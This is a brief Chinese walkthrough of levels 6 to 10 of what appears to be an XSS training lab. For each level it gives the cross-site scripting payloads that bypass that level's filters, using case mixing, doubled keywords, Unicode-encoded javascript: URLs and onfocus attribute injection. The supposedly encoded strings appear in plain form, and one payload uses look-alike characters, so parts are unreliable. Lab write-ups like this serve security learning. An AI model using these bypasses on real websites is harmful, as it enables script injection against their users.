第六关:less-6
步骤一:输入<script>alert(1)</script>
步骤二:大小写绕过"> <sCript>alert()</sCript> <"
第七关:less-7
步骤一:输入<script>alert(1)</script>
步骤二:经查询on,script,href过滤,进行双拼写绕过
"> <a hrehreff=javasscriptcript:alert()>x</a > <"
第八关:less-8
步骤一:输入 <script>alert(1)</script>
步骤二:这关过滤很多字符,输入:javascript:alert()
利用在线工具进行Unicode编码后得到,在线Unicode编码解码
javascript:alert()
第九关:less-9
步骤一:输入 <script>alert(1)</script>
步骤二:" src data onfocus <script> <a href=javascript:alert()> j链接不合法
利用在线工具进行Unicode编码后得到,在线Unicode编码解码
javascript:alert()/* http:// */
第十关:less-10
步骤一:" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> j
步骤二:?t_sort=" οnfοcus=javascript:alert() type="text